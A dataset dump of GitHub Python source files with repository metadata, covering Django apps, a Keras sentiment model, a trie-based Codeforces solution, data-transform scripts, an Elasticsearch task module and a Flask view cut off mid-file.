blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
87d25e6b41c0eb727cfc908b91e9860fdcc17135 | d5087da467f07bc88579955a8ce9454cba8a3703 | /gestionusuarios/apps.py | d6ce7ba72cb30b0ef1374db560924a53ea6d416b | [] | no_license | RobJVE/Gestion-TrabajosdeGrado | 99744fcc9542d6c53748acbd79f508b3a8bfc122 | e929d6bca4d48570b5eaaf773c60eb511197a769 | refs/heads/master | 2020-11-28T16:17:01.318021 | 2020-01-08T17:19:54 | 2020-01-08T17:19:54 | 229,865,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | from django.apps import AppConfig
class GestionusuariosConfig(AppConfig):
name = 'gestionusuarios'
| [
"robertojve12@gmail.com"
] | robertojve12@gmail.com |
eaeb032aefcca3f6234961954e3d3943a85cbe8b | 51e354e58f991d264bb6c3bf1c9277b16c332254 | /Boletín1/Ejercicio22.py | e7b7e0a84cea0bf3e996b921769e4eeb95dd8179 | [] | no_license | matey97/Programacion | 93ec50e26a136de0d53f4b847e92e703ee2a8296 | 929993978057c4c2e86469d11349ecd1fb45ae28 | refs/heads/master | 2021-07-21T16:00:17.170393 | 2017-10-31T18:32:46 | 2017-10-31T18:32:46 | 109,030,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | '''
Created on 1 de oct. de 2015
@author: al341802
'''
from math import pi
radio=float(input("Introduce el radio:"))
area=pi*radio**2
long=2*pi*radio
print("El area es:{0:.2f}".format(area))
print("La longitud de la circunferencia es:{0:.2f}".format(long)) | [
"al341802@uji.es"
] | al341802@uji.es |
42a8dac1509c16a1f9ee4746a23db2e89449bf64 | 11d265eba2ced9de43c339e4014c779b521320cd | /accounts/migrations/0004_auto_20200423_2253.py | eccb31bc3dd7e0a1872e9574429fc5cdc2edd129 | [] | no_license | Sloshpit/budget_old | d9271de625cd7e3aa66ccbec501b005e50cd2812 | a5603996b026542adb3bc8c578c03bcb843bea01 | refs/heads/master | 2022-04-23T08:42:43.377827 | 2020-04-25T14:40:39 | 2020-04-25T14:40:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # Generated by Django 3.0.5 on 2020-04-24 02:53
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_auto_20200423_2251'),
]
operations = [
migrations.RenameField(
model_name='account',
old_name='transaction_date',
new_name='balance_date',
),
migrations.RemoveField(
model_name='account',
name='transaction',
),
migrations.RemoveField(
model_name='account',
name='transaction_amount',
),
]
| [
"neel.maheshwari@gmail.com"
] | neel.maheshwari@gmail.com |
2ac308de7ea56c3e49a6bf3d403f763954382164 | d8788a352e84b6184fc65e499fd2e198855b4ab1 | /05_RNN/rnn_imdb.py | b63b931774d18de45b4d4797ce04b1ad3e94ac39 | [] | no_license | yjkim0083/3min_keras | 7cb5c883d2b337beb5dc54ba235fac37bc206640 | 46e192cf37a3407e69b6b81c10cb2b1dff35586d | refs/heads/master | 2020-05-17T00:21:12.795091 | 2019-04-26T09:30:32 | 2019-04-26T09:30:32 | 183,394,144 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,849 | py | # import library
from __future__ import print_function
from keras.preprocessing import sequence
from keras.datasets import imdb
from keras import layers, models
# 데이터 준비
class Data:
def __init__(self, max_features=20000, maxlen=80):
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)
x_train = sequence.pad_sequences(x_train, maxlen=maxlen)
x_test = sequence.pad_sequences(x_test, maxlen=maxlen)
self.x_train, self.y_train = x_train, y_train
self.x_test, self.y_test = x_test, y_test
# modeling
class RNN_LSTM(models.Model):
def __init__(self, max_features, maxlen):
x = layers.Input((maxlen,))
h = layers.Embedding(max_features, 128)(x)
h = layers.LSTM(128, dropout=0.2, recurrent_dropout=0.2)(h)
y = layers.Dense(1, activation="sigmoid")(h)
super().__init__(x, y)
# try using different optimizers and differend optimizer configs
self.compile(loss="binary_crossentropy", optimizer="adam", metrics=["accuracy"])
# 학습 및 평가
class Machine:
def __init__(self, max_features=20000, maxlen=80):
self.data = Data(max_features, maxlen)
self.model = RNN_LSTM(max_features, maxlen)
def run(self, epochs=3, batch_size=32):
data = self.data
model = self.model
print("Training stage")
print("============================")
model.fit(data.x_train, data.y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(data.x_test, data.y_test))
score, acc = model.evaluate(data.x_test, data.y_test, batch_size=batch_size)
print("Test performance: accuracy={0}, loss={1}".format(acc, score))
def main():
m = Machine()
m.run()
if __name__ == "__main__":
main() | [
"yjkim0083@gmail.com"
] | yjkim0083@gmail.com |
4c78ff7b8d99fa7a2c0507d61ea3beb4dacca5b9 | 14828d39e62daa1805fcad2046ee4f7059e89f89 | /build/catkin_generated/order_packages.py | 19733f48c19b3444ef2949ad6d90006b2b27fc26 | [] | no_license | haosen9527/TF_demo | 699afa4c2c2053b6816f79dcd35e7857d9ea2cef | 4ce2c632d8eefc2abd87b7af2a1582982f68f4d2 | refs/heads/master | 2020-03-21T07:53:31.813816 | 2018-06-22T13:35:06 | 2018-06-22T13:35:06 | 138,306,195 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | # generated from catkin/cmake/template/order_packages.context.py.in
source_root_dir = "/home/micros/catkin_new/src"
whitelisted_packages = "".split(';') if "" != "" else []
blacklisted_packages = "".split(';') if "" != "" else []
underlay_workspaces = "/home/micros/catkin_new/devel;/opt/ros/kinetic".split(';') if "/home/micros/catkin_new/devel;/opt/ros/kinetic" != "" else []
| [
"ljhao1994@163..com"
] | ljhao1994@163..com |
18dbf87af9420c5a2ca503743e7f290aaeb054b1 | 8f50df9241833fa477687a02448b7f3f929f5d93 | /codeforces/706d/solution.py | b06518e0a9ac9aea9eb4f5b0457a67a89f93b811 | [] | no_license | tjwudi/problem-solving | 7004453d037915892348308a16670eb499577cd5 | d29ba6bce035c9cb75bf2bc4e7b84c062ecda615 | refs/heads/master | 2020-04-05T18:29:32.513172 | 2016-08-31T12:24:49 | 2016-08-31T12:24:49 | 65,372,323 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py | import sys
import math
def get_bit(num, position, wide = 1):
"""
get_bit(0b00001, 1) == 1
get_bit(0b00010, 2) == 1
"""
return (num >> (position - wide)) & ((1 << wide) - 1)
class DNode(object):
def __init__(self, count=0, bits_group=1):
self.childs = [None] * (1 << bits_group)
self.count = count
self.num = None
@property
def valid(self):
return self.count > 0
class DTree(object):
def __init__(self):
self.DIGIT_LEN = 30
self.BITS_GROUP = 5
self.root = DNode(bits_group=self.BITS_GROUP)
def num_exists(self, num):
current_node = self.root
for i in xrange(self.DIGIT_LEN, 0, -self.BITS_GROUP):
digit = get_bit(num, i, self.BITS_GROUP)
if current_node.childs[digit] is None or not current_node.childs[digit].valid:
return False
current_node = current_node.childs[digit]
return True
def insert(self, num):
current_node = self.root
current_node.count += 1
for i in xrange(self.DIGIT_LEN, 0, -self.BITS_GROUP):
digit = get_bit(num, i, self.BITS_GROUP)
if current_node.childs[digit] is None:
current_node.childs[digit] = DNode(bits_group=self.BITS_GROUP)
current_node = current_node.childs[digit]
current_node.count += 1
def remove(self, num):
current_node = self.root
current_node.count -= 1
for i in xrange(self.DIGIT_LEN, 0, -self.BITS_GROUP):
digit = get_bit(num, i, self.BITS_GROUP)
next_node = current_node.childs[digit]
next_node.count -= 1
current_node = next_node
def find_max(self, mask):
current_node = self.root
num = 0
for i in xrange(self.DIGIT_LEN, 0, -self.BITS_GROUP):
digit_mask = get_bit(mask, i, self.BITS_GROUP)
for masked_trial in xrange((1 << self.BITS_GROUP) - 1, -1, -1):
trial = masked_trial ^ digit_mask
if (current_node.childs[trial] is not None and
current_node.childs[trial].valid):
num = (num << self.BITS_GROUP) + masked_trial
current_node = current_node.childs[trial]
break
return num
class Solution(object):
def run(self):
tree = DTree()
tree.insert(0)
n = int(raw_input())
for _ in xrange(n):
op, num = raw_input().split()
num = int(num)
if op == '+':
tree.insert(num)
if op == '-':
tree.remove(num)
if op == '?':
print(tree.find_max(num))
class Test(object):
def run_test(self):
self.test_insert()
self.test_remove()
self.test_find_max()
def test_insert(self):
tree = DTree()
tree.insert(10)
tree.insert(9)
assert tree.num_exists(10)
assert tree.num_exists(9)
print('test_insert passed')
def test_remove(self):
tree = DTree()
assert not tree.num_exists(10)
tree.insert(10)
assert tree.num_exists(10)
tree.remove(10)
assert not tree.num_exists(10)
print('test_remove passed')
def test_find_max(self):
tree = DTree()
tree.insert(3)
tree.insert(0)
assert tree.find_max(3) == 3
print('test_find_max passed')
if __name__ == '__main__':
if len(sys.argv) == 2 and sys.argv[1] == 'profile':
import cProfile
cProfile.run('Solution().run()')
elif len(sys.argv) == 2 and sys.argv[1] == 'test':
Test().run_test()
else:
Solution().run()
| [
"webmaster@leapoahead.com"
] | webmaster@leapoahead.com |
c663247f79902d830119db43c67ab692f260485a | 46a130d64358681dea6003f2c5555c98bfd69e11 | /load_to_itop/scripts/trans_to_dump.py | dacd6c9aea0802c3c07f30eb1f61fffc8c9d170b | [] | no_license | yyztc/itopV2 | 5220ba2f3419dcfc3b3d5d0d756ea9cd232f6c47 | 855d8c6d61cbe1feea646f9b4ec7825d73d7ecc0 | refs/heads/master | 2020-11-28T08:47:24.809754 | 2018-02-09T01:34:53 | 2018-02-09T01:34:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,286 | py | #encoding=utf8
import shutil
import csv
import os
import numpy as np
import pandas as pd
from pprint import pprint
from config import server_src_csv, vm_src_csv, server_static_csv, network_csv, storage_csv, sync_ds_csv, brand_csv, model_csv, osfamily_csv, osversion_csv, networktype_csv, physicalserver_csv, virtualmachine_csv, hypervisor_csv, nonesx_server_csv
from config import DUMPDIR,STATICDIR
def format_osfamily_name(osversion_name):
if 'WINDOW' in osversion_name.upper():
osfamily_name = 'WINDOWS'
elif 'RED' in osversion_name.upper():
osfamily_name ='REDHAT'
elif 'CENTOS' in osversion_name.upper():
osfamily_name='CENTOS'
elif 'ESX' in osversion_name.upper():
osfamily_name='ESX'
else:
osfamily_name='OTHERS'
return osfamily_name
def format_server(server_df,csvfile):
# rename column name
columns = {
'vc_model_name':'model_id',
'vc_cpu_speedGHz':'cpu_speed',
'vc_os_version':'osversion_id',
'vc_memory_size':'memory',
'vc_cpu_num':'cpu_num',
'vc_power_status':'power_status',
'vc_env':'env_id',
'vc_fiber_hba_num':'fiber_card_num',
'vc_brand_name':'brand_id',
'vc_cpu_type':'cpu_type',
'vc_name':'name',
'vc_ip':'ip',
'vc_cpu_core':'cpu_core',
'vc_fiber_hba_device':'fiber_card_model'
}
server_df = server_df.rename(columns=columns).assign(org_id=lambda x:'Cargosmart').assign(business_criticity=lambda x:'high').assign(status='production').assign(server_type='ESX')[['model_id','cpu_speed','osversion_id','memory','cpu_num','power_status','env_id','fiber_card_num','brand_id','cpu_type','name','org_id','business_criticity','cpu_core','ip','fiber_card_model','status','server_type']]
# add osfmaily
server_df['osfamily_id'] = server_df['osversion_id'].map(lambda x:format_osfamily_name(x))
# join with static data
server_df['join_name']=server_df['name'].map(lambda x:x.lower().split('.cargosmart.com')[0])
df = pd.merge(server_df, server_static_df, left_on='join_name',right_on='server_name').drop(['join_name','server_name'], axis=1)
# union nonesx server
df = pd.concat([df,nonesx_server_df])
# format name without domain
df['name'] = df['name'].map(lambda x:x.split('.')[0].lower())
# add primary key
df.index=[x for x in range(len(df))]
df['primary_key'] = df.index+1
df.set_index('primary_key',inplace=True)
df.to_csv(csvfile)
return df
def format_vm(vm_df,csvfile):
columns = {
'vc_name': 'name',
'vc_memory_size': 'ram',
'vc_cpu_num': 'cpu',
'vc_ip': 'ip',
'vc_server_name': 'virtualhost_id',
'vc_env': 'env_id',
'vc_vm_os_version': 'osversion_id',
'vc_power_status': 'powerState',
}
vm_df = vm_df.rename(columns=columns).assign(org_id=lambda x:'Cargosmart').assign(business_criticity=lambda x:'high')[['name','ram','cpu','ip','virtualhost_id','env_id','osversion_id','powerState','org_id','business_criticity']]
# add osfmaily
vm_df['osfamily_id'] = vm_df['osversion_id'].map(lambda x:format_osfamily_name(x))
# format name without domain
vm_df['name']=vm_df['name'].map(lambda x:x.split('.')[0].lower())
vm_df['virtualhost_id']=vm_df['virtualhost_id'].map(lambda x:x.split('.')[0].lower())
# add primary key
vm_df.index=[x for x in range(len(vm_df))]
vm_df['primary_key'] = vm_df.index+1
vm_df.set_index('primary_key',inplace=True)
vm_df.to_csv(csvfile)
return vm_df
def gen_brand_csv(server_df,network_df,csvfile):
server_brand=server_df['model_id'].map(lambda x:x.split()[0]).drop_duplicates().rename('name')
network_brand = network_df.brand_id.drop_duplicates().rename('name')
storage_brand = storage_df.brand_id.drop_duplicates().rename('name')
merge_brand = server_brand.append(network_brand).append(storage_brand).drop_duplicates()
df = pd.DataFrame(merge_brand).reset_index(drop=True)
df.index=[x for x in range(len(df))]
df['primary_key']=df.index+1
df.set_index('primary_key',inplace=True)
df.to_csv(csvfile)
return df
def gen_model_csv(server_df,network_df,csvfile):
server_model = server_df.assign(type=lambda x:'Server').drop(['name'], axis=1).rename(columns={'model_id':'name'})[['name','type','brand_id']].drop_duplicates()
network_model = network_df.assign(type=lambda x:'NetworkDevice').drop(['name'], axis=1).rename(columns={'model_id':'name'})[['name','type','brand_id']].drop_duplicates()
storage_model = storage_df.assign(type=lambda x:'StorageSystem').drop(['name'], axis=1).rename(columns={'model_id':'name'})[['name','type','brand_id']].drop_duplicates()
merge_model = server_model.append(network_model).append(storage_model)
# df = pd.DataFrame(merge_model).reset_index(drop=True)
df = pd.DataFrame(merge_model)
df.index=[x for x in range(len(df))]
df['primary_key'] = df.index+1
df.set_index('primary_key',inplace=True)
df.to_csv(csvfile)
return df
def gen_osfamily_csv(server_df,vm_df,csvfile):
server_osfamily = server_df['osfamily_id'].drop_duplicates().rename('name')
vm_osfamily = vm_df['osfamily_id'].drop_duplicates().rename('name')
merge_osfamily = server_osfamily.append(vm_osfamily)
# df = pd.DataFrame(merge_osfamily).reset_index(drop=True)
df = pd.DataFrame(merge_osfamily)
df.index=[x for x in range(len(df))]
df['name']=df['name'].map(lambda x:str(x).strip())
df=df.loc[df['name'] != ''].loc[df['name']!='nan']
df['primary_key'] = df.index+1
df.set_index('primary_key',inplace=True)
df.to_csv(csvfile)
return df
def gen_osversion_csv(server_df,vm_df,csvfile):
server_osversion = server_df.drop(['name'], axis=1).rename(columns={'osversion_id':'name'})[['name','osfamily_id']].drop_duplicates()
vm_osversion = vm_df.drop(['name'], axis=1).rename(columns={'osversion_id':'name'})[['name','osfamily_id']].drop_duplicates()
merge_osversion = server_osversion.append(vm_osversion)
merge_osversion = merge_osversion.loc[merge_osversion['name'].notnull()]
# df = pd.DataFrame(merge_osversion).reset_index(drop=True)
df = pd.DataFrame(merge_osversion)
df.index=[x for x in range(len(df))]
df['primary_key'] = df.index+1
df.set_index('primary_key',inplace=True)
df.to_csv(csvfile)
return df
def gen_networktype_csv(network_df,csvfile):
networktype=network_df.networkdevicetype_id.drop_duplicates().rename('name')
# df = pd.DataFrame(networktype).reset_index(drop=True)
df = pd.DataFrame(networktype)
df.index=[x for x in range(len(df))]
df['primary_key'] = df.index+1
df.set_index('primary_key',inplace=True)
df.to_csv(csvfile)
return df
def gen_hypervisor_csv(server_df,csvfile):
df = server_df[['name','org_id','env_id','business_criticity','status']].assign(server_id=lambda x:x['name'])
df.to_csv(csvfile)
return df
if __name__ == '__main__':
server_src_df = pd.DataFrame(pd.read_csv(server_src_csv))
vm_src_df = pd.DataFrame(pd.read_csv(vm_src_csv))
server_static_df = pd.DataFrame(pd.read_csv(server_static_csv))
nonesx_server_df = pd.DataFrame(pd.read_csv(nonesx_server_csv))
network_df = pd.DataFrame(pd.read_csv(network_csv))
storage_df = pd.DataFrame(pd.read_csv(storage_csv))
# format data
server_df = format_server(server_src_df,physicalserver_csv)
vm_df = format_vm(vm_src_df,virtualmachine_csv)
# gen csv
gen_brand_csv(server_df,network_df,brand_csv)
gen_model_csv(server_df,network_df,model_csv)
gen_osfamily_csv(server_df,vm_df,osfamily_csv)
gen_osversion_csv(server_df,vm_df,osversion_csv)
gen_networktype_csv(network_df,networktype_csv)
gen_hypervisor_csv(server_df,hypervisor_csv)
# copy static csv file to dump dir
static_files = os.listdir(STATICDIR)
for filename in static_files:
src = os.path.join(STATICDIR,filename)
dst = os.path.join(DUMPDIR,filename)
if os.path.exists(dst):
os.remove(dst)
shutil.copyfile(src,dst)
| [
"root@devops.localdomain"
] | root@devops.localdomain |
7aeb59e68007f90a70eb8d4027a76867e6acdc54 | df5c8186fa526be8fc6c5295a82d673458b668c3 | /Unit 7/Ai bot/test bots/RandomRoy.py | 3cfc23afb5de89c47a4847168a94abdc056af627 | [
"MIT"
] | permissive | KevinBoxuGao/ICS3UI | 296a304e048080d3a6089a788eb3b74c099d5f1e | 2091a7c0276b888dd88f2063e6acd6e7ff7fb6fa | refs/heads/master | 2020-04-23T03:32:49.424600 | 2019-06-18T21:20:36 | 2019-06-18T21:20:36 | 170,881,750 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,320 | py | from random import *
#STRATEGY: JUST PICK RANDOMLY, MAKING SURE THAT I DON'T LOSE BY CHEATING
def getMove( myScore, mySnowballs, myDucksUsed, myMovesSoFar,
oppScore, oppSnowballs, oppDucksUsed, oppMovesSoFar ):
if mySnowballs == 0: #If I'm out of snowballs...
if myDucksUsed < 5: #...and if I have ducks left, then pick between DUCK and RELOAD
return choice([ "DUCK", "RELOAD" ])
else: #...otherwise I must RELOAD because I'm out of ducks and snowballs
return "RELOAD"
elif mySnowballs == 10: #If I'm at the snowball limit...
if myDucksUsed < 5: #...and if I have ducks left, then pick randomly between DUCK and THROW
return choice([ "DUCK", "THROW" ])
else: #...otherwise I must THROW because I have 10 snowballs and I'm out of ducks
return "THROW"
else: #If I have a few snowballs...
if myDucksUsed < 5: #...and have ducks left, then just pick randomly
return choice([ "THROW", "DUCK", "RELOAD" ])
else: #...otherwise, I can't duck, so pick randomly between THROW and RELOAD
return choice([ "THROW", "RELOAD" ])
| [
"kevingao2003@gmail.com"
] | kevingao2003@gmail.com |
924d20afd9dad0f7b5bf8a84d7d57e1cfef8e356 | c2d8493fd9aa1baccff2e70658b1da5e350a3d33 | /prj_auth/models.py | 16a77cc9fdbb59e254da3e5abcaa457008072417 | [] | no_license | tufedtm/dj_aut | 6c5fe1ea148fb2a942dfa815bc5b16f7b7b833f5 | 0b8876263434f97191b0d5a423147ec662c004a4 | refs/heads/master | 2021-01-12T15:12:18.625147 | 2016-09-27T13:23:17 | 2016-09-27T13:23:17 | 69,359,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from django.contrib.auth.models import AbstractUser
class MyUser(AbstractUser):
class Meta:
verbose_name = 'мой пользователь'
verbose_name_plural = 'мои пользователи'
| [
"tufedtm@gmail.com"
] | tufedtm@gmail.com |
3c9e94802edf1b2bda9664db98775acda9edceef | d5b187cd25874c73fe18aa534ca6a4fa388b5464 | /python-fundamentals/week2/day4-data_structures_cont/Ans_part2_2.py | 15f15165c23a4a68daa4952cd7294248e9cf2c17 | [] | no_license | jwcrandall/galvanize | dec7618c5e5bb8af7340acad8e07f58b703b317f | e4f05c172a2e046f7ee3c151618ed1295717a0d4 | refs/heads/master | 2022-09-15T02:49:45.927678 | 2020-06-04T19:43:12 | 2020-06-04T19:43:12 | 269,430,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 870 | py | # Write a script that prompts the user for a state name.
search_state = input("Please enter a state name: ")
search_state = search_state.lower()
#It will then check that state name against the dictionary below to give back the capital of that state.
# However, you'll notice that the dictionary doesn't know the capitals for all the states.
# If the user inputs the name of a state that isn't in the dictionary, your script should
# print that the capital is unknown.
state_dictionary = {'Colorado': 'Denver', 'Alaska': 'Juneau', 'California': 'Sacramento',
'Georgia': 'Atlanta', 'Kansas': 'Topeka', 'Nebraska': 'Lincoln',
'Oregon': 'Salem', 'Texas': 'Austin', 'New York': 'Albany'}
if search_state in state_dictionary:
print(state_dictionary[search_state])
else:
print('{} capital unknown.'.format(search_state))
| [
"josephcrandall@me.com"
] | josephcrandall@me.com |
e3b72e06b1595b812d60964be50b5f7d6587a95a | 32a24714b7450eea329faa19b93475545d3ec7a9 | /app/rapper_wrapper.py | 5aa6a67c44fc380ead94e33d6d18a725247439b7 | [] | no_license | yum-yab/rapper-mod | b32fcf224d0cdd1e75f2f203381efa8a23a6fb69 | a63a2360056f862bceb3b465af274428321e1d1b | refs/heads/main | 2023-03-29T10:22:54.395656 | 2021-04-01T12:53:14 | 2021-04-01T12:53:14 | 353,626,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,433 | py | import os
import sys
import json
import subprocess
import re
rapperErrorsRegex = re.compile(r"^rapper: Error.*$")
rapperWarningsRegex = re.compile(r"^rapper: Warning.*$")
rapperTriplesRegex = re.compile(r"rapper: Parsing returned (\d+) triples")
def returnRapperErrors(rapperLog):
errorMatches = []
warningMatches = []
for line in rapperLog.split("\n"):
if rapperErrorsRegex.match(line):
errorMatches.append(line)
elif rapperWarningsRegex.match(line):
warningMatches.append(line)
return errorMatches, warningMatches
def getTripleNumberFromRapperLog(rapperlog):
match = rapperTriplesRegex.search(rapperlog)
if match != None:
return int(match.group(1))
else:
return None
def parse_rdf_from_string(
rdf_string, base_uri, input_type=None, output_type="ntriples"
):
if input_type == None:
command = ["rapper", "-I", base_uri, "-g", "-", "-o", output_type]
else:
command = ["rapper", "-I", base_uri, "-i", input_type, "-", "-o", output_type]
process = subprocess.run(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
input=bytes(rdf_string, "utf-8"),
)
triples = getTripleNumberFromRapperLog(process.stderr.decode("utf-8"))
errors, warnings = returnRapperErrors(process.stderr.decode("utf-8"))
return process.stdout.decode("utf-8"), triples, errors, warnings
| [
"streitmatter@informatik.uni-leipzig.de"
] | streitmatter@informatik.uni-leipzig.de |
f71387df36af9f3c0cb4897aa762c93b0ccbdb5f | 3f60b999ea7bda83c9586f75f52463dc20337f24 | /sensitive_user_portrait/weibo_rank/Offline_task.py | de919db3a2449e8b9e35b521386aa9943040a4ae | [] | no_license | jianjian0dandan/sensitive_user_portrait | 629e49ce71db92b50634bac9c828811cdb5381e9 | cacc30267ebc0e621b1d48d4f1206277a0f48123 | refs/heads/master | 2021-01-20T23:18:07.138057 | 2016-05-22T12:09:40 | 2016-05-22T12:09:40 | 42,869,287 | 0 | 0 | null | 2015-09-21T13:55:12 | 2015-09-21T13:55:11 | null | UTF-8 | Python | false | false | 6,454 | py | #-*-coding: utf-8 -*-
import datetime
import json
import time as TIME
from elasticsearch import Elasticsearch
from time_utils import ts2datetime, datetime2ts, ts2date
from global_utils import es_user_portrait as es
WEIBO_RANK_KEYWORD_TASK_INDEX = 'weibo_rank_keyword_task'
WEIBO_RANK_KEYWORD_TASK_TYPE = 'weibo_rank_task'
MAX_ITEMS = 2 ** 10
def add_task(user_name , type="keyword", range="all", pre='flow_text_', during='1', start_time='2013-09-07', end_time='2013-09-07', keyword='hello,world', sort_norm='reposts_count', sort_scope='all_limit_keyword', time=1, number=100):
time_now = int(TIME.time())
task_id = user_name + "-" + str(time_now)
tmp_list = keyword.split(',')
keyword_list = []
for item in tmp_list:
if item:
keyword_list.append(item)
body_json = {
'submit_user' : user_name ,
'keyword' : json.dumps(keyword_list),
'keyword_string': "&".join(keyword_list),
'submit_time' : ts2datetime(time_now),
'create_time': time_now,
'end_time' : datetime2ts(end_time),
'search_type' : type,
'status':0,
'range' : range ,
'user_ts' : user_name + '-'+ str(time_now),
'pre' : pre,
'during' : during ,
'start_time' : datetime2ts(start_time) ,
'sort_norm' : sort_norm ,
'sort_scope' : sort_scope,
'time' : time ,
'isall' : isall,
'number': number
}
es.index(index = WEIBO_RANK_KEYWORD_TASK_INDEX , doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE , id=task_id, body=body_json)
return body_json["user_ts"]
def search_weibo_task(user_name):
c_result = {}
query = {"query":{"bool":{"must":[{"term":{"user_rank_task.submit_user":user_name}}]}},"size":MAX_ITEMS,"sort":[{"create_time":{"order":"desc"}}],"fields":["status","search_type","keyword","submit_user","sort_scope","sort_norm","start_time","user_ts","end_time", "create_time", 'number']}
if 1:
return_list = []
result = es.search(index=WEIBO_RANK_KEYWORD_TASK_INDEX , doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE , body=query)['hits']
c_result['flag'] = True
for item in result['hits']:
result_temp = {}
result_temp['submit_user'] = item['fields']['submit_user'][0]
result_temp['search_type'] = item['fields']['search_type'][0]
result_temp['keyword'] = json.loads(item['fields']['keyword'][0])
result_temp['sort_scope'] = item['fields']['sort_scope'][0]
result_temp['sort_norm'] = item['fields']['sort_norm'][0]
result_temp['start_time'] = ts2datetime(item['fields']['start_time'][0])
result_temp['end_time'] = ts2datetime(item['fields']['end_time'][0])
result_temp['status'] = item['fields']['status'][0]
result_temp['create_time'] = ts2date(item['fields']['create_time'][0])
result_temp['search_id'] = item['fields']['user_ts'][0]
tmp = item['fields'].get('number', 0)
if tmp:
result_temp['number'] = int(tmp[0])
else:
result_temp['number'] = 100
return_list.append(result_temp)
c_result['data'] = return_list
return c_result
def getResult(search_id):
item = es.get(index=WEIBO_RANK_KEYWORD_TASK_INDEX , doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE , id=search_id)
try:
result_obj = {}
result_obj['keyword'] = json.loads(item['_source']['keyword'])
result_obj['sort_scope'] = item['_source']['sort_scope']
result_obj['sort_norm'] = item['_source']['sort_norm']
result_obj['start_time'] = ts2datetime(item['_source']['start_time'])
result_obj['end_time'] =ts2datetime(item['_source']['end_time'])
result_obj['result'] = json.loads(item['_source']['result'])
result_obj['text_results'] = json.loads(item['_source']['text_results'])
result_obj['number'] = item['_source']['number']
return result_obj
except :
return []
def delOfflineTask(search_id):
es.delete(index=WEIBO_RANK_KEYWORD_TASK_INDEX , doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE , id = search_id )
return True
def sort_task(user, keyword, status, start_time, end_time, submit_time):
query_body = {
"query":{
"filtered":{
"filter":{
"bool":{
"must":[
{"term":{"submit_user": user}}
]
}
}
}
},
"size": 10000,
"sort":{"submit_time":{"order":"desc"}}
}
query_list = []
if keyword:
keyword_list = keyword.split(',')
query_list.append({"terms":{"keyword_string":keyword_list}})
if status != 2:
query_list.append({"term":{"status": status}})
if start_time and end_time:
start_ts = datetime2ts(start_time)
end_ts = datetime2ts(end_time)
query_list.append({"range":{"start_time":{"gte":start_ts, "lte":end_ts}}})
query_list.append({"range":{"end_time":{"gte":start_ts, "lte":end_ts}}})
if submit_time:
query_list.append({"term":{"submit_time": submit_time}})
if query_list:
query_body["query"]["filtered"]["filter"]["bool"]["must"].extend(query_list)
#print query_body
search_results = es.search(index=WEIBO_RANK_KEYWORD_TASK_INDEX, doc_type=WEIBO_RANK_KEYWORD_TASK_TYPE, body=query_body)["hits"]["hits"]
results = []
if search_results:
for item in search_results:
iter_item = item['_source']
tmp = []
tmp.append(iter_item['search_type'])
tmp.append(json.loads(iter_item['keyword']))
tmp.append(ts2datetime(iter_item['start_time']))
tmp.append(ts2datetime(iter_item['end_time']))
tmp.append(iter_item['range'])
tmp.append(ts2date(iter_item['create_time']))
tmp.append(iter_item['status'])
tmp.append(iter_item['sort_norm'])
tmp.append(iter_item['sort_scope'])
tmp.append(item['_id']) # task_name
results.append(tmp)
return results
if __name__ == "__main__":
print search_task("admin@qq.com", [], 0, '', '', '2016-04-12')
| [
"1257819385@qq.com"
] | 1257819385@qq.com |
43bf411f069beff4b058247c875c82e5f19f01bc | 4b1965b3d831ab54998973afb26f4327ed010336 | /info/user/views.py | 4edbf7fa25d4329141c2449cb244798b16174185 | [] | no_license | yc12192057/information11_mm | 7d353dfe61962eb0bd2c29b7f0b54a2a62953262 | 2e4052d130b200797aa8a57a0d37f8267d523a8b | refs/heads/master | 2020-03-21T10:22:23.558714 | 2018-06-24T02:34:25 | 2018-06-24T02:34:25 | 138,447,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,383 | py | from flask import current_app
from flask import g
from flask import request
from flask import session
from info.utils.image_storage import storage
from info import constants
from info import db
from info.models import Category, News
from info.utils.response_code import RET
from . import profile_blue
from flask import render_template,redirect,jsonify
from info.utils.common import user_login_data
from info.utils.image_storage import storage
@profile_blue.route("/news_list")
@user_login_data
def news_list():
page = request.args.get("p",1)
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
user = g.user
paginate = News.query.filter(News.user_id == user.id).paginate(page,2,False)
items = paginate.items
current_page = paginate.page
total_page = paginate.pages
news_list = []
for item in items:
news_list.append(item.to_review_dict())
data = {
"current_page":current_page,
"total_page":total_page,
"news_list":news_list
}
